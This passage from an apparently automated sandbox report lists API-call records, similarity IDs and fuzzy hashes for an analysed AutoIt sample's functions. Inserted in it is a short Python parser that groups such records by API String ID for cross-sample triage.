                                                                              • Opcode Fuzzy Hash: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
                                                                              • Instruction Fuzzy Hash: 7701D6B5642154EBCB01E7A4C907FFF77AC9B49340F10401AB411B3292DB6C9E1987B5
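The three SendMessageW functions above share the API String ID 3850602802-1403004172 (API ID MessageSend, String ID ComboBox$ListBox) while each keeps its own Opcode ID and Instruction ID; on this page the first component of every MessageSend function's API String ID is 3850602802, so the ID is the handle to pivot on when looking for the same function in another sample's report. The Python below is an added example, not Joe Sandbox code: it parses records in the layout shown on this page into structured data, separates a function's own calls from the "Part of subcall function" entries inherited from its callees, and groups functions by API String ID. The embedded sample is a constructed excerpt of four records from this page with the Associated and fuzzy-hash lines omitted; the layout rules it relies on (a record begins at each "APIs" header, bullets under "Similarity" are "key: value") are read off the visible listing and are an assumption, not a documented Joe Sandbox format.

```python
"""Parse Joe Sandbox IDA-plugin function records and cluster them by API String ID."""
import re
from collections import defaultdict

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ITEM_RE = re.compile(r"^•\s*(.*)$")
# One API bullet: optional 'Part of subcall function <addr>: ' prefix,
# Name.MODULE, optional '(args)', then 'ref: <call-site address>'.
API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-F]+): )?"
    r"(\w+)\.([A-Z0-9_]+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$")

# Constructed excerpt of four records from this report (Associated and
# fuzzy-hash lines omitted to keep the sample short).
SAMPLE_REPORT = """\
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007EB7EF
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 007EB6EB
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 007EB76C
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
APIs
  • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
  • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
• GetWindowRect.USER32(00000000,?), ref: 00819968
• GetSysColor.USER32(00000012), ref: 00819982
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
"""

def parse_records(text):
    """One dict per function record: apis, strings, source, similarity."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function record opens with its APIs section
            current = {"apis": [], "strings": [], "source": {}, "similarity": {}}
            records.append(current)
            section = line
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        m = ITEM_RE.match(line)
        if m is None or current is None:
            continue
        item = m.group(1)
        if section == "APIs":
            a = API_RE.match(item)
            if a is not None:
                current["apis"].append({
                    "subcall": a.group(1),  # callee address for inherited calls, else None
                    "name": a.group(2), "module": a.group(3),
                    "args": a.group(4).split(",") if a.group(4) is not None else [],
                    "ref": a.group(5)})
        elif section == "Strings":
            current["strings"].append(item)
        else:  # Memory Dump Source, Joe Sandbox IDA Plugin, Similarity: 'key: value'
            key, _, value = item.partition(": ")
            bucket = "similarity" if section == "Similarity" else "source"
            current[bucket][key] = value
    return records

def direct_call_sites(record):
    """(Name.MODULE, call site) for calls the function makes itself, skipping
    the 'Part of subcall function' entries inherited from its callees."""
    return [(f"{a['name']}.{a['module']}", a["ref"])
            for a in record["apis"] if a["subcall"] is None]

def group_by_api_string_id(records):
    """API String ID -> Opcode IDs of the functions that share it."""
    groups = defaultdict(list)
    for r in records:
        sim = r["similarity"]
        if "API String ID" in sim:
            groups[sim["API String ID"]].append(sim.get("Opcode ID"))
    return dict(groups)
```

Running `group_by_api_string_id(parse_records(SAMPLE_REPORT))` yields one group of three Opcode IDs under 3850602802-1403004172 and a singleton under 1983116058-2160076837; feeding the same parser the listing from a second sample's report and intersecting the API String IDs is the cheap first pass before comparing Opcode IDs or fuzzy hashes. The `direct_call_sites` split matters for triage because a record's "Part of subcall function" lines repeat the callee's imports under every caller, which inflates naive API counts.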
                                                                              APIs
                                                                              • LoadImageW.USER32(007B0000,00000063,00000001,00000010,00000010,00000000), ref: 007B4048
                                                                              • EnumResourceNamesW.KERNEL32(00000000,0000000E,007F67E9,00000063,00000000,76090280,?,?,007B3EE1,?,?,000000FF), ref: 008241B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: EnumImageLoadNamesResource
                                                                              • String ID: >{
                                                                              • API String ID: 1578290342-1646470997
                                                                              • Opcode ID: f4ae2f792f75b409287471ee31dfa63eede207f55985a120807ab46b0bfc052b
                                                                              • Instruction ID: 4aac537566511449c83ee82ce81fdf50296566d7ec015b6329db55b15d595a71
                                                                              • Opcode Fuzzy Hash: f4ae2f792f75b409287471ee31dfa63eede207f55985a120807ab46b0bfc052b
                                                                              • Instruction Fuzzy Hash: 52F06771650324B7EA205B1ABC4EFD23BADF754BB5F10051AF228AA5E0D2F4D0C08AA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: 594a1dcfc0bb3815cca3a067177b64d66f13cee0d2d40c7fec6884eaa8892110
                                                                              • Instruction ID: e8514b556dbb54fc0708aa08b9db72d2a8435240be27621af2e2cba1b680598a
                                                                              • Opcode Fuzzy Hash: 594a1dcfc0bb3815cca3a067177b64d66f13cee0d2d40c7fec6884eaa8892110
                                                                              • Instruction Fuzzy Hash: 7FE0D877A0432867D720EAE5EC0AE97FBACFBA5760F010116F916D7241E678E641C7E0
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007EA63F
                                                                                • Part of subcall function 007D13F1: _doexit.LIBCMT ref: 007D13FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: d276060caa58edc4aad7c2c89a2a84770034a42d9e262436117de02df4463c88
                                                                              • Instruction ID: 3a98e4b1bc32c5b71082f0920aef1971b968dda1f8ead78c49135d585af49367
                                                                              • Opcode Fuzzy Hash: d276060caa58edc4aad7c2c89a2a84770034a42d9e262436117de02df4463c88
                                                                              • Instruction Fuzzy Hash: DFD02B313C4B1873C21437A83C0FFC43648DB55BA5F04001AFB08D62C249EE955001D9
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0082ACC0
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0082AEBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                              • String ID: WIN_XPe
                                                                              • API String ID: 510247158-3257408948
                                                                              • Opcode ID: 96bb95bc3864f38b8a8faf16a0602944445289c715a08bb0e38bd3b786b3d254
                                                                              • Instruction ID: c3b9bc95bcea5fe8e260cd44156bc369b6976e9ac370ff05a1b786245d33e35c
                                                                              • Opcode Fuzzy Hash: 96bb95bc3864f38b8a8faf16a0602944445289c715a08bb0e38bd3b786b3d254
                                                                              • Instruction Fuzzy Hash: F8E0C970C006199FCB15DBA9E984AEDB7B9FF88301F148495E556F2160DB705A84DF22
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008186A2
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008186B5
                                                                                • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 5aac3d6c05099e74ceb3647aa8400a704c16020662b525234c0c3f0182cf7705
                                                                              • Instruction ID: 19d39d4a5b6ce1ba48bdd0df5a8b81189957aaea2c506796abc2f656afacec1d
                                                                              • Opcode Fuzzy Hash: 5aac3d6c05099e74ceb3647aa8400a704c16020662b525234c0c3f0182cf7705
                                                                              • Instruction Fuzzy Hash: 5AD0C971784318A7E2686770AC0FFD66A18AB54B11F110815B75AAA2D0C9A4A950C654
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008186E2
                                                                              • PostMessageW.USER32(00000000), ref: 008186E9
                                                                                • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 28ab949d916fcb4e1e0a3ec1d57515462ad558c3d9d0cfe75139d376c7388763
                                                                              • Instruction ID: d08dcb8e5284b8968f51599d78cde043dd0d68df1138d01ab4ff309243bd08b3
                                                                              • Opcode Fuzzy Hash: 28ab949d916fcb4e1e0a3ec1d57515462ad558c3d9d0cfe75139d376c7388763
                                                                              • Instruction Fuzzy Hash: 9BD0C971785318ABE2686770AC0FFC66A18AB54B11F510815B756EA2D0C9A4A950C654